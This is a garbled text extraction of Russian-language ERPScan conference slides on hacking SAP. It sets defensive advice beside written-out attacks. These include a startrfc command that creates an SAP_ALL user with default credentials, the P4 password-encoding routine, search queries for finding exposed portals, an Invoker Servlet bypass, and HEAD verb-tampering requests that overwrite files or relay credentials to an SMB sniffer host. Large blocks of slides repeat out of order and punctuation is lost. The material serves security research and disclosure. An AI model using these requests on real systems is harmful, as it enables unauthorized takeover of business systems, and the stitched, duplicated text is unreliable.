erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Публичная информация об уязвимостях
bull Всего более 150
erpscancom 5ERPScan mdash invest in security to secure investments
SAP не дремлет
Из доклада Кристиана Виппермана (SAP) на последнем SAP TechED в Лас Вегасе
erpscancom 6ERPScan mdash invest in security to secure investments
Поговорим о безопасности
bull Что мы знаем о SAPbull Проблемы ответственности и контроляbull Примеры обхода SODbull Уязвимости ABAP движка из интернетbull Уязвимости J2EE движка из интернетbull Взломать SAP за 60 секунд демо
erpscancom 7ERPScan mdash invest in security to secure investments
Что мы знаем о SAP
Вставьте рисунок на слайд скруглите верхний левый и нижний правый угол (Формат ndash Формат рисунка) добавьте контур (оранжевый толщина ndash 3)
erpscancom 8ERPScan mdash invest in security to secure investments
Shut up
And
Pay
SAP Who cares
erpscancom 9ERPScan mdash invest in security to secure investments
Постоянные новые угрозы
bull Тема атак на SAP стала ldquoмоднойrdquo в security community
bull Публикуется множество уязвимостей
bull Ежегодно появляются угрозы
erpscanru 10ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что делать
bull Администраторы не достаточно осведомлены
bull Понимание безопасности только на уровне матрицы SOD
bull Системы усложняются
Как атакуют
2007 ndash Архитектурные уязвимости RFC
2008 ndash Атаки на рабочие станции SAP
2009 ndash Бэкдоры для SAP атаки на SAPRouter
2010 ndash Атаки на WEB-приложения SAP
2010 ndash Stuxnet под SAP
2011 ndash Архитектурные и программные уязвимости в ERP
erpscanru 11ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Последний год
2011 ndash Атаки на JAVA движок SAP
2011 ndash SQL инъекции в ABAP
2011 ndash Переполнение буффера в ABAP
2011 ndash Атаки Session Fixation в SAP
2011 ndash Атаки на SAPGUI
2011 ndash Спуфинг и перехват DIAG протокола
erpscanru 12ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Угрозы для бизнеса
Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов
Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)
Мошенничествоbull Подмена данных о платежахbull Ложные транзакции
erpscanru 13ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
SAP не дремлет
Из доклада Кристиана Виппермана (SAP) на последнем SAP TechED в Лас Вегасе
erpscancom 6ERPScan mdash invest in security to secure investments
Поговорим о безопасности
bull Что мы знаем о SAPbull Проблемы ответственности и контроляbull Примеры обхода SODbull Уязвимости ABAP движка из интернетbull Уязвимости J2EE движка из интернетbull Взломать SAP за 60 секунд демо
erpscancom 7ERPScan mdash invest in security to secure investments
Что мы знаем о SAP
Вставьте рисунок на слайд скруглите верхний левый и нижний правый угол (Формат ndash Формат рисунка) добавьте контур (оранжевый толщина ndash 3)
erpscancom 8ERPScan mdash invest in security to secure investments
Shut up
And
Pay
SAP Who cares
erpscancom 9ERPScan mdash invest in security to secure investments
Постоянные новые угрозы
bull Тема атак на SAP стала ldquoмоднойrdquo в security community
bull Публикуется множество уязвимостей
bull Ежегодно появляются угрозы
erpscanru 10ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что делать
bull Администраторы не достаточно осведомлены
bull Понимание безопасности только на уровне матрицы SOD
bull Системы усложняются
Как атакуют
2007 ndash Архитектурные уязвимости RFC
2008 ndash Атаки на рабочие станции SAP
2009 ndash Бэкдоры для SAP атаки на SAPRouter
2010 ndash Атаки на WEB-приложения SAP
2010 ndash Stuxnet под SAP
2011 ndash Архитектурные и программные уязвимости в ERP
erpscanru 11ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Последний год
2011 ndash Атаки на JAVA движок SAP
2011 ndash SQL инъекции в ABAP
2011 ndash Переполнение буффера в ABAP
2011 ndash Атаки Session Fixation в SAP
2011 ndash Атаки на SAPGUI
2011 ndash Спуфинг и перехват DIAG протокола
erpscanru 12ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Угрозы для бизнеса
Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов
Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)
Мошенничествоbull Подмена данных о платежахbull Ложные транзакции
erpscanru 13ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
